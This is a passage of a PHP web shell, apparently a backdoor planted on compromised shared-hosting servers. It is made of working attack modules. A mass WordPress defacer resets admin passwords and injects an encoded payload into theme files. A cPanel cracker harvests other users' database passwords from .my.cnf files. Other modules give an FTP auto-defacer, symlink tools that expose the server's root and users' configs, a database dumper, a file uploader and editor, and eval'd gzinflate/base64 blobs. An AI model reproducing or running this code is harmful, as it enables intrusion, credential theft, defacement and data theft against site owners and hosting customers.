1360false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1361fail</font></td>";
1362 }
1363
1364 }
1365
1366 }
1367
1368 }
1369
1370 }
1371
1372 }
1373
1374 }
1375
1376 break;
1377 case"wp_def":
1378 $user="admin";
1379 $pass="foo";
1380 echo"<div align=\"center\">
1381<form action=\"\" method=\"POST\">
1382<label>Deface URL: </label> <input type=\"text\" style=\"width:450px;\" name=\"deface_page\"><br />
1383<input type=\"submit\" value=\"DEFACE\">
1384</form>
1385";
1386
1387 if($_POST){
1388 $deface=file_get_contents(trim($_POST["deface_page"]));
1389
1390 if(is_readable("/var/named")){
1391 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\">";
1392 echo"<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td><td>DEF URL</td>";
1393 $list=scandir("/var/named");
1394 foreach($list as$domain){
1395
1396 if(strpos($domain,".db")){
1397 $domain=str_replace(".db","",$domain);
1398 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
1399 $url="http://".$domain;
1400
1401 if(chk_header($pageURL."ciprut/".$owner["name"]."-WordPress.txt")){
1402 $config=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
1403 file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1404 $cnf=file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1405 $hostname=Find($cnf,"define('DB_HOST', '","');");
1406 $username=Find($cnf,"define('DB_USER', '","');");
1407 $password=Find($cnf,"define('DB_PASSWORD', '","');");
1408 $dbname=Find($cnf,"define('DB_NAME', '","');");
1409 $prefix=Find($cnf,"table_prefix = '","'");
1410 $link=mysql_connect($hostname,$username,$password);
1411
1412 if($link){
1413 $hash=crypt($pass);
1414 mysql_select_db($dbname,$link);
1415 $tab=$prefix."users";
1416 $query2=@mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
1417 $query3=@mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
1418 $req=@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1419 $data=mysql_fetch_array($req);
1420 $site_url=$data["option_value"];
1421 error_reporting(0);
1422 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1423false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"green\">[#]
1424User Pass Changed </font><br>";
1425 $post="log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1";
1426 $def="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."')));
1427exit; ?>";
1428 $buffer0=CurlPage($site_url."/wp-login.php",$post);
1429
1430 if(!preg_match("/logout/i",$buffer0)){
1431 echo"<font color='red'>[X] FAILED TO LOGIN</font><br />";
1432 } else {
1433 echo"<font color='green'>[#] LOGGED IN :D</font><br>";
1434 $urlz=$site_url."/wp-admin/theme-editor.php";
1435 $themeditor=CurlPage($urlz,$cookie,null);
1436
1437 if(preg_match("/update file/i",$themeditor)){
1438 echo"theme-editor opened<br /></td>";
1439 } else {
1440 echo"error
1441opening theme edtitor!</td>";
1442 }
1443
1444 $nola=explode(Chr(10),$themeditor);
1445 foreach($nola as$nline){
1446
1447 if(preg_match("%theme-editor\.php\\?file=%",$nline)&&preg_match("%\\((404\\.php|archive\\.php|comment\.php)\)%",strtolower($nline))){
1448 $modify[Find($nline,"(",")")]=Find($nline,"<a href=\"","\"");
1449 }
1450
1451 }
1452
1453 echo"<td>";
1454
1455 if(is_array($modify)){
1456 foreach($modify as$met=>$indfile){
1457 $nri=str_replace(".","_",$met);
1458 $nri="n".$nri;
1459 $indfile=str_replace("&","&",$indfile);
1460 $url=trim($site_url."/wp-admin/".$indfile);
1461 $themepage=CurlPage($url,"");
1462 $_wpnonce=Find($themepage,"name=\"_wpnonce\" value=\"","\"");
1463 $_file=Find($themepage,"name=\"file\" value=\"","\"");
1464 $nfile=explode("themes",$_file);
1465 $jfile=$site_url."/wp-content/themes".end($nfile);
1466 $url=$site_url."/wp-admin/theme-editor.php";
1467 $postme="newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
1468 $themedied=CurlPage($url,$postme);
1469
1470 if(preg_match("%<div id=\"message\" class=\"updated\">%",$themedied)){
1471 $theme=Find($themeditor,"<li><a href=\"theme-editor.php?file=404.php&theme=","\">404 Template");
1472
1473 if(preg_match("/twenty ten/i",$theme)){
1474 $theme="twentyten";
1475 }
1476
1477 elseif(preg_match("/twenty eleven/i",$theme)){
1478 $theme="twentyeleven";
1479 }
1480
1481 $theme=trim(str_replace("/","",$theme));
1482 $d=$site_url."/wp-content/themes/".$theme."/404.php";
1483 listall("wp.txt",$d.Chr(10));
1484 }
1485
1486 }
1487
1488 echo"<a href=".$d.">LINK</a><br />";
1489 echo"</td>";
1490 }
1491
1492 }
1493
1494 } else {
1495 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1496false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"red\">[x]
1497mysql fail</font></td>";
1498 }
1499
1500 }
1501
1502 }
1503
1504 }
1505
1506 }
1507
1508 }
1509
1510 break;
1511 case"uploader":
1512 echo"<center><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
1513 echo"<center><input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\"
1514value=\"Upload\"></form></center>";
1515
1516 if($_POST["_upl"]=="Upload"){
1517
1518 if(@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"])){
1519 echo"<p align=\"center\"><font face=\"Verdana\"
1520size=\"1\"><font color=\"white\"> Done !!</font><br>";
1521 } else {
1522 echo"<font color=\"#FF0000\">Failed :( </font></p>
1523 </td></table></tr>
1524";
1525 }
1526
1527 }
1528
1529 }
1530
1531 }
1532}
1533elseif(isset($_GET['x']) && ($_GET['x'] == 'private')){
1534?>
1535<form action="?y=<?php echo $pwd; ?>&x=private" method="post">
1536<b><center>love you Salsha :* i have (mpc)</b>
1537</form>
1538
1539<?php }
1540
1541
1542elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
1543 @ob_start();
1544 @eval("phpinfo();");
1545 $buff = @ob_get_contents();
1546 @ob_end_clean();
1547 $awal = strpos($buff,"<body>")+6;
1548 $akhir = strpos($buff,"</body>");
1549 echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
1550}
1551elseif(isset($_GET['view']) && ($_GET['view'] != "")){
1552 if(is_file($_GET['view'])){
1553 if(!isset($file)) $file = magicboom($_GET['view']);
1554 if(!$win && $posix){
1555 $name=@posix_getpwuid(@fileowner($folder));
1556 $group=@posix_getgrgid(@filegroup($folder));
1557 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
1558 }
1559 else {
1560 $owner = $user;
1561 }
1562 $filn = basename($file);
1563 echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1564 <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1565 <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1566 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1567 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1568 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1569 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1570 </form>
1571 </td></tr>
1572 <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1573 <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1574 <tr><td>Owner</td><td>".$owner."</td></tr>
1575 <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1576 <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1577 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1578 <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr>
1579 <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr>
1580 </table>
1581 ";
1582 if(isset($_GET['type']) && ($_GET['type']=='image')){
1583 echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>";
1584 }
1585 elseif(isset($_GET['type']) && ($_GET['type']=='code')){
1586 echo "<div class=\"viewfile\">";
1587 $file = wordwrap(@file_get_contents($file),"240","\n");
1588 @highlight_string($file);
1589 echo "</div>";
1590 }
1591 else {
1592 echo "<div class=\"viewfile\">";
1593 echo nl2br(htmlentities((@file_get_contents($file))));
1594 echo "</div>";
1595 }
1596 }
1597 elseif(is_dir($_GET['view'])){
1598 echo showdir($pwd,$prompt);
1599 }
1600
1601}
1602//////////////////////////////////////////////////
1603elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
1604
1605 if(isset($_POST['save'])){
1606 $file = $_POST['saveas'];
1607 $content = magicboom($_POST['content']);
1608 if($filez = @fopen($file,"w")){
1609 $time = date("d-M-Y H:i",time());
1610 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
1611 else $msg = "failed to save";
1612 @fclose($filez);
1613 }
1614 else $msg = "permission denied";
1615 }
1616 if(!isset($file)) $file = $_GET['edit'];
1617 if($filez = @fopen($file,"r")){
1618 $content = "";
1619 while(!feof($filez)){
1620 $content .= htmlentities(str_replace("''","'",fgets($filez)));
1621 }
1622 @fclose($filez);
1623 }
1624
1625?>
1626<form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
1627<table class="cmdbox">
1628<tr><td colspan="2">
1629<textarea class="output" name="content">
1630<?php echo $content; ?>
1631</textarea>
1632<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1633 <?php echo $msg; ?></td></tr>
1634</table>
1635</form>
1636<?php
1637}
1638elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
1639{
1640?>
1641<form action="?y=<?php echo $pwd; ?>&x=logout" method="post">
1642
1643<?php
1644 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1645 echo '<center><b>logged out</b></center>';
1646}
1647elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
1648 {
1649 ?>
1650
1651 <a href="?<?php echo "path=".$path; ?>&x=brute><input class=inputzbut type=submit value="cpanel bruteforce" /></a>
1652 <a href="?<?php echo "path=".$path; ?>&x=cpcrack"><input class=inputzbut type=submit value="cpanel finder/cracker" /></a><br>
1653 <a href="?<?php echo "path=".$path; ?>&x=cpdef"><input class=inputzbut type=submit value="cpanel deface" /></a>
1654 <a href="?<?php echo "path=".$path; ?>&x=brute"><input class=inputzbut type=submit value="cpanel brute force" /></a>
1655 <?php
1656 }
1657elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
1658 {
1659 ?>
1660 <form action="?y=<?php echo $pwd; ?>&x=brute" method="post">
1661 <?php
1662
1663@ini_set('display_errors',0);
1664function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1665 $ar0=explode($marqueurDebutLien, $text);
1666 $ar1=explode($marqueurFinLien, $ar0[$i]);
1667 return trim($ar1[0]);
1668}
1669
1670echo '<h1>Cpanel Finder/Cracker</h1><br/>';
1671
1672echo "<center>";
1673$d0mains = @file('/etc/named.conf');
1674$domains = scandir("/var/named");
1675
1676if ($domains or $d0mains)
1677{
1678 $domains = scandir("/var/named");
1679 if($domains) {
1680echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1681$count=1;
1682$dc = 0;
1683$list = scandir("/var/named");
1684foreach($list as $domain){
1685if(strpos($domain,".db")){
1686$domain = str_replace('.db','',$domain);
1687$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1688$dirz = '/home/'.$owner['name'].'/.my.cnf';
1689$path = getcwd();
1690
1691if (is_readable($dirz)) {
1692copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1693$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1694$password=entre2v2($p,'password="','"');
1695echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1696$dc++;
1697}
1698
1699}
1700}
1701echo '</table>';
1702$total = $dc;
1703echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1704echo '</center>';
1705}else{
1706$d0mains = @file('/etc/named.conf');
1707 if($d0mains) {
1708echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1709$count=1;
1710$dc = 0;
1711$mck = array();
1712foreach($d0mains as $d0main){
1713 if(@eregi('zone',$d0main)){
1714 preg_match_all('#zone "(.*)"#',$d0main,$domain);
1715 flush();
1716 if(strlen(trim($domain[1][0])) >2){
1717 $mck[] = $domain[1][0];
1718 }
1719 }
1720}
1721$mck = array_unique($mck);
1722$usr = array();
1723$dmn = array();
1724foreach($mck as $o) {
1725 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1726 $usr[] = $infos['name'];
1727 $dmn[] = $o;
1728}
1729array_multisort($usr,$dmn);
1730$dt = file('/etc/passwd');
1731$passwd = array();
1732foreach($dt as $d) {
1733 $r = explode(':',$d);
1734 if(strpos($r[5],'home')) {
1735 $passwd[$r[0]] = $r[5];
1736 }
1737}
1738$l=0;
1739$j=1;
1740foreach($usr as $r) {
1741$dirz = '/home/'.$r.'/.my.cnf';
1742$path = getcwd();
1743if (is_readable($dirz)) {
1744copy($dirz, ''.$path.'/'.$r.'.txt');
1745$p=file_get_contents(''.$path.'/'.$r.'.txt');
1746$password=entre2v2($p,'password="','"');
1747echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1748$dc++;
1749 flush();
1750 $l=$l?0:1;
1751 $j++;
1752 }
1753 }
1754 }
1755echo '</table>';
1756$total = $dc;
1757echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
1758echo '</center>';
1759
1760}
1761}else{
1762echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
1763}
1764
1765echo "</body></html>";
1766?>
1767<?php }
1768elseif(isset($_GET['x']) && ($_GET['x'] == 'cpdef'))
1769 {
1770 ?>
1771 <form action="?path=<?php echo $path; ?>&x=cpdef" method="post">
1772<?php
1773$head = '<html>
1774<head>
1775<title>Auto Cpanel Defacer</title>
1776<script language=\'javascript\'>
1777function hide_div(id)
1778{
1779 document.getElementById(id).style.display = \'none\';
1780 document.cookie=id+\'=0;\';
1781}
1782function show_div(id)
1783{
1784 document.getElementById(id).style.display = \'block\';
1785 document.cookie=id+\'=1;\';
1786}
1787function change_divst(id)
1788{
1789 if (document.getElementById(id).style.display == \'none\')
1790 show_div(id);
1791 else
1792 hide_div(id);
1793}
1794</script>'; ?>
1795<html>
1796 <head>
1797 <?php
1798 echo $head ;
1799 echo '
1800
1801<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
1802 <td width="100%" align=center valign="top" rowspan="1">
1803 <div class="hedr">
1804 <td height="10" align="left" class="td1"></td></tr><tr><td width="100%" align="center" valign="top" rowspan="1"><font color="red" face="comic sans ms"size="1"><b>
1805 <br><font face="Andalus" size="4" color=#58FAF4>Cpanel Auto Defacer</font><br>
1806 <br><br>
1807 <font color="RED" face="gothic" size="3"></font><br>
1808 </table>
1809';
1810?>
1811
1812
1813<body bgcolor=black><h6 style="text-align:center"><font color=white>
1814<p><form method=post>
1815 server ip: <input class=inputzbut type=text name=hi value=ip>
1816 username: <input class=inputzbut type=text name=tx value=>  
1817 password:<input class=inputzbut type=text name=p value=><p>
1818 file that you want to deface: <input class=inputzbut type=text name=ph value="index.php">
1819 <p><font color=red size=3>Deface page link : </font>
1820 <textarea rows=1 cols=50 class=inputzbut name=deface value="your daface page link">
1821 </textarea>
1822 <p><input class=inputzbut type=submit name=sm value="Submit" /><br>
1823 </form>
1824<?php
1825
1826if(isset($_POST['sm']))
1827{
1828 $ip=trim($_POST['hi']);
1829 $u=trim($_POST['tx']);
1830 $p=trim($_POST['p']);
1831 $d=trim($_POST['ph']);
1832 $df=trim($_POST['deface']);
1833 echo "<br><font color=white size=2>";
1834 echo "<font color=red size=3>server ip :</font> ".$ip;
1835 echo "<br><font color=red size=3>user :</font>  ".$u;
1836 echo "<br><font color=red size=3>password :</font>  ".$p;
1837 echo "<br><font color=red size=3>dirctory :</font>  ".$d;
1838 echo "<br><font color=red size=3>deface link :</font><br>".$df."<br>";
1839 $dl="public_html/".$d;
1840 $si= ftp_connect($ip);
1841
1842$try= ftp_login($si,$u,$p);
1843if ((!$si) || (!$try))
1844{
1845 echo "<br>could not connected :(";
1846 exit;
1847}
1848else
1849{
1850 echo "<br>connection done<br><br>";
1851}
1852$deface = ftp_put($si, $dl , $df, FTP_BINARY);
1853if ($deface)
1854{
1855 echo "hell yesh page got defaced successfully";
1856}
1857else
1858{
1859 echo "try manually :(";
1860}
1861 }
1862?>
1863 </strong>
1864 </td>
1865 </tr>
1866 <tr>
1867 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
1868 <td valign="top" bgcolor="#151515" colspan="5">
1869 <strong>
1870<form method="POST" target="_blank">
1871 <strong>
1872<input name="matikan" type="hidden" value="sekatan">
1873 </strong>
1874
1875<?php
1876if(''==($func=@ini_get('disable_functions')))
1877{
1878echo "<font color=white>No Security for Function</font></b>";
1879}else{
1880echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
1881echo "<font color=red>$func</font></b>";
1882echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
1883echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
1884 </strong>
1885 </td></tr>';
1886}
1887?></strong></td></tr></table></table></table>
1888<?php
1889}
1890///////////////////////////////////////////////////////////////////////////
1891elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; }
1892elseif(isset($_GET['x']) && ($_GET['x'] == 'zonekerupuk')){ @eval(gzinflate(base64_decode($zonekerupuk))); "</div>"; }
1893#################################################################
1894########################################
1895########################
1896#####################
1897# START HERE
1898//ini sym file
1899////////////////////////////////////////////////////////////////////////////////////////////////////////////
1900elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);
1901$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1902$op =@fopen ('sym/.htaccess','w');
1903fwrite($op ,$htaccess);
1904echo '<br><br><center><h2>Symlink File !</h2></center><center><br>
1905<div class="mybox"><h2 class="k2ll33d2">Symlink</h2><br>
1906<form method="post"> File Path:<br>
1907<input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/>
1908<br>Symlink Name<br><input class="inputz" type="text" name="symfile" value="s.txt" size="60"/><br><br>
1909<input class="inputzbut" type="submit" value="symlink" name="symlink" /><br><br></form></div></center>';
1910$target = $_POST['file'];
1911$symfile = $_POST['symfile'];
1912$symlink = $_POST['symlink'];
1913if ($symlink) {@symlink("$target","sym/$symfile");
1914echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><br><br><br><br></center>';}}
1915/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1916//sym sec
1917elseif(isset($_GET['x']) && ($_GET['x'] == 'sec')){
1918$d0mains = @file("/etc/named.conf");
1919##httaces
1920if($d0mains){
1921@mkdir("k2",0777);
1922@chdir("k2");
1923@exe("ln -s / root");
1924$file3 = 'Options all
1925DirectoryIndex Sux.html
1926AddType text/plain .php
1927AddHandler server-parsed .php
1928AddType text/plain .html
1929AddHandler txt .html
1930Require None
1931Satisfy Any';
1932$fp3 = fopen('.htaccess','w');
1933$fw3 = fwrite($fp3,$file3);@fclose($fp3);
1934echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
1935<table align=center border=1 style='width:60%;border-color:#333333;'>
1936<tr>
1937<td align=center><font size=3>S. No.</font></td>
1938<td align=center><font size=3>Domains</font></td>
1939<td align=center><font size=3>Users</font></td>
1940<td align=center><font size=3>Symlink</font></td>
1941</tr>";
1942$dcount = 1;
1943foreach($d0mains as $d0main){
1944if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
1945flush();
1946if(strlen(trim($domains[1][0])) > 2){
1947$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1948echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
1949<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
1950<td>".$user['name']."</td>
1951<td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
1952flush();
1953$dcount++;}}}
1954echo "</table>";
1955}else{
1956$TEST=@file('/etc/passwd');
1957if ($TEST){
1958@mkdir("k2",0777);
1959@chdir("k2");
1960exe("ln -s / root");
1961$file3 = 'Options all
1962 DirectoryIndex Sux.html
1963 AddType text/plain .php
1964 AddHandler server-parsed .php
1965 AddType text/plain .html
1966 AddHandler txt .html
1967 Require None
1968 Satisfy Any';
1969 $fp3 = fopen('.htaccess','w');
1970 $fw3 = fwrite($fp3,$file3);
1971 @fclose($fp3);
1972 echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
1973 <table align=center border=1><tr>
1974 <td align=center><font size=4>S. No.</font></td>
1975 <td align=center><font size=4>Users</font></td>
1976 <td align=center><font size=4>Symlink</font></td></tr>";
1977 $dcount = 1;
1978 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
1979 while(!feof($file)){
1980 $s = fgets($file);
1981 $matches = array();
1982 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1983 $matches = str_replace("home/","",$matches[1]);
1984 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1985 continue;
1986 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
1987 <td align=center><font class=txt>" . $matches . "</td>";
1988 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1989 $dcount++;}fclose($file);
1990 echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
1991 DirectoryIndex Sux.html
1992 AddType text/plain .php
1993 AddHandler server-parsed .php
1994 AddType text/plain .html
1995 AddHandler txt .html
1996 Require None
1997 Satisfy Any';
1998 $fp3 = fopen('.htaccess','w');
1999 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2000 echo "<br><br><center><h2>Symlink Server !</h2></center><br><br><center>
2001 <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
2002 <table align=center border=1><tr>
2003 <td align=center><font size=4>id</font></td>
2004 <td align=center><font size=4>Users</font></td>
2005 <td align=center><font size=4>Symlink</font></td></tr>";
2006 $temp = "";$val1 = 0;$val2 = 1000;
2007 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2008 if ($uid)$temp .= join(':',$uid)."\n";}
2009 echo '<br/>';$temp = trim($temp);$file5 =
2010 fopen("test.txt","w");
2011 fputs($file5,$temp);
2012 fclose($file5);$dcount = 1;$file =
2013 fopen("test.txt", "r") or exit("Unable to open file!");
2014 while(!feof($file)){$s = fgets($file);$matches = array();
2015 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2016 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2017 continue;
2018 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2019 <td align=center><font class=txt>" . $matches . "</td>";
2020 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2021 $dcount++;}
2022 fclose($file);
2023 echo "</table></div></center>";unlink("test.txt");
2024 } else
2025 echo "<center><font size=4>Cannot create Symlink</font></center>";
2026 }
2027 }
2028 }
2029/////////////////////////////////////////////////////////////////
2030## db dump
2031elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
2032 {
2033 ?>
2034 <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
2035 <?php
2036echo $head.'<p align="center">';
2037echo '
2038<table width=371 class=tabnet >
2039<tr><th colspan="2">Database Dump</th></tr>
2040<tr>
2041 <td>Server </td>
2042 <td><input class="inputz" type=text name=server size=52></td></tr><tr>
2043 <td>Username</td>
2044 <td><input class="inputz" type=text name=username size=52></td></tr><tr>
2045 <td>Password</td>
2046 <td><input class="inputz" type=text name=password size=52></td></tr><tr>
2047 <td>DataBase Name</td>
2048 <td><input class="inputz" type=text name=dbname size=52></td></tr>
2049 <tr>
2050 <td>DB Type </td>
2051 <td><form method=post action="'.$me.'">
2052 <select class="inputz" name=method>
2053 <option value="gzip">Gzip</option>
2054 <option value="sql">Sql</option>
2055 </select>
2056 <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
2057 </form></center></table>';
2058if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
2059$date = date("Y-m-d");
2060$dbserver = $_POST['server'];
2061$dbuser = $_POST['username'];
2062$dbpass = $_POST['password'];
2063$dbname = $_POST['dbname'];
2064$file = "Dump-$dbname-$date";
2065$method = $_POST['method'];
2066if ($method=='sql'){
2067$file="Dump-$dbname-$date.sql";
2068$fp=fopen($file,"w");
2069}else{
2070$file="Dump-$dbname-$date.sql.gz";
2071$fp = gzopen($file,"w");
2072}
2073function write($data) {
2074global $fp;
2075if ($_POST['method']=='ssql'){
2076fwrite($fp,$data);
2077}else{
2078gzwrite($fp, $data);
2079}}
2080mysql_connect ($dbserver, $dbuser, $dbpass);
2081mysql_select_db($dbname);
2082$tables = mysql_query ("SHOW TABLES");
2083while ($i = mysql_fetch_array($tables)) {
2084 $i = $i['Tables_in_'.$dbname];
2085 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
2086 write($create['Create Table'].";\n\n");
2087 $sql = mysql_query ("SELECT * FROM ".$i);
2088 if (mysql_num_rows($sql)) {
2089 while ($row = mysql_fetch_row($sql)) {
2090 foreach ($row as $j => $k) {
2091 $row[$j] = "'".mysql_escape_string($k)."'";
2092 }
2093 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
2094 }
2095 }
2096}
2097if ($method=='ssql'){
2098fclose ($fp);
2099}else{
2100gzclose($fp);}
2101header("Content-Disposition: attachment; filename=" . $file);
2102header("Content-Type: application/download");
2103header("Content-Length: " . filesize($file));
2104flush();
2105
2106$fp = fopen($file, "r");
2107while (!feof($fp))
2108{
2109 echo fread($fp, 65536);
2110 flush();
2111}
2112fclose($fp);
2113}
2114
2115}
2116
2117/* Goblok
2118 start here */
2119// domain viewer by S1r_V1ru5 rec0de by Kapaljetz666
2120 elseif(isset($_GET['x']) && ($_GET['x'] == 'dv')){ @ini_set('output_buffering',0);
2121{
2122 ?>
2123 <form action="?y=<?php echo $pwd; ?>&x=dv" method="post">
2124 <center><h2>Domain Viewer by S1r_V1ru5<br>notes: if blank(no domain) that mean not work use domain viewer, you can use symlink server</center><br><br>
2125 <?php
2126 function openBaseDir()
2127{
2128$openBaseDir = ini_get("open_basedir");
2129if (!$openBaseDir)
2130 {
2131 $openBaseDir = '<font color="green">OFF</font>';
2132 }
2133 else
2134 {
2135 $openBaseDir = '<font color="red">ON</font>';
2136 }
2137 return $openBaseDir;
2138}
2139
2140
2141echo '
2142 <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
2143 <td height="100" align="left" class="td1">';
2144 $pg = basename(__FILE__);
2145 $safe_mode = @ini_get('safe_mode');
2146 $dir = @getcwd();
2147 ////////////////////////////////////////////////////
2148 // LET'S PLAY ~
2149 ##.htaccess
